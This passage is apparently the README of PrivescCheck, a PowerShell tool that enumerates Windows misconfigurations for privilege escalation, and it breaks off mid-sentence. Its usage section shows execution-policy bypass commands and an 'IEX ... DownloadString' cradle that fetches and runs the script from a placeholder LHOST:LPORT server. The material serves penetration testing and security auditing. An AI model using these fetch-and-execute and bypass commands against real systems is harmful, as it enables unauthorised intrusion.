This script aims to enumerate common Windows security misconfigurations which can be leveraged for privilege escalation and gather various information which might be useful for exploitation and/or post-exploitation. I built on the amazing work done by @harmj0y and @mattifestation in PowerUp. I added more checks and also tried to reduce the number of false positives.

It's still a work in progress because there are a few more checks I want to implement, but it's already quite complete. If you have any suggestions (improvements, features), feel free to contact me on Twitter @itm4n.

Usage

Use the script from a PowerShell prompt.

    PS C:\Temp> Set-ExecutionPolicy Bypass -Scope Process -Force
    PS C:\Temp> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck

Display output and write to a log file at the same time.

    PS C:\Temp> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object "C:\Temp\result.txt"

Use the script from a CMD prompt.

    C:\Temp>powershell -ep bypass -c ". .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck"

Import the script from a web server.

    C:\Temp>powershell "IEX (New-Object Net.WebClient).DownloadString('http://LHOST:LPORT/Invoke-PrivescCheck.ps1'); Invoke-PrivescCheck"

Yet another Windows Privilege escalation tool, why?

I really like PowerUp because it can enumerate common vulnerabilities very quickly and without using any third-party tools. The problem is that it hasn't been updated for several years now. The…
